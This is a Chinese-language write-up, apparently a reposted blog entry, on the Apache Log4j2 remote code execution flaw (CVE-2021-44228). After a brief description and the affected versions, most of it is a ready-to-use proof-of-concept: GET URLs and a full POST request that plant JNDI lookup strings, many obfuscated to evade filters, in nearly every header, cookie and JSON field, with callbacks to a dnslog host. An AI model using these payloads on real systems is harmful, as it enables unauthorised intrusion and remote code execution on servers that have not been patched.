Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)

news2024/9/27 18:46:14

漏洞描述：

当用户输入信息时，应用程序中的log4j 2组件会将信息记录到日志中

假如日志中包含有语句${jndi:ldap:attacker:1099/exp}，log4j就会去解析该信息，通过jndi的lookup() 方法去解析该url：ldap:attacker:1099/exp

受害主机访问伪造的ldap服务，访问恶意java.class类，执行恶意代码。如果ldap没有解析成功会自动访问http

影响范围：

Apache Log4j 2.x <= 2.14

条件：lookup()参数可控

漏洞验证：

1.get方式：

http://www.xxxx.cn/solr/admin/cores?action=${jndi:ldap://${sys:java.version}. xxxx.dnslog.cn }


http://www.xxx.cn/col/col3513?action=${jndi:ldap://${sys:java.version}.xxxx.dnslog.cn}

2.post方式：

poc

POST / HTTP/1.1
Host: www.xxxx.cn
Accept-Language: ${jndi:ldap://xxxx.dnslog.cn}
Accept: ${jndi:ldap://xxxx.dnslog.cn}
User-Agent: Mozilla ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/}
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cache-Control: max-age=0
Abc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Remote-Addr: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cookie: ${jndi:ldap://xxxx.dnslog.cn}=${jndi:ldap://xxxx.dnslog.cn};JSESSIONID=${jndi:ldap://xxxx.dnslog.cn};SESSIONID=${jndi:ldap://xxxx.dnslog.cn};PHPSESSID=${jndi:ldap://xxxx.dnslog.cn};token=${jndi:ldap://xxxx.dnslog.cn/vulscan};session=${jndi:ldap://xxxx.dnslog.cn}
X-Remote-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
True-Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Cf-Connecting_ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Contact: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Client-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
If-Modified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
X-Real-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Originating-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://xxxx.dnslog.cn/a}
Content-Type: application/json
Content-Length: 857

{"username": "${jndi:ldap://xxxx.dnslog.cn}", "account": "${jndi:ldap://xxxx.dnslog.cn}", "uid": "${jndi:ldap://xxxx.dnslog.cn}", "passwd": "${jndi:ldap://xxxx.dnslog.cn}", "userPassword": "${jndi:ldap://xxxx.dnslog.cn}", "pass": "${jndi:ldap://xxxx.dnslog.cn}", "email": "${jndi:ldap://xxxx.dnslog.cn}", "phone": "${jndi:ldap://xxxx.dnslog.cn}", "pwd": "${jndi:ldap://xxxx.dnslog.cn}", "id": "${jndi:ldap://xxxx.dnslog.cn}", "user": "${jndi:ldap://xxxx.dnslog.cn}", "login_password": "${jndi:ldap://xxxx.dnslog.cn}", "login_username": "${jndi:ldap://xxxx.dnslog.cn}", "userAccount": "${jndi:ldap://xxxx.dnslog.cn}", "password": "${jndi:ldap://xxxx.dnslog.cn}", "email_address": "${jndi:ldap://xxxx.dnslog.cn}", "payload": "${jndi:ldap://xxxx.dnslog.cn}"}

发送请求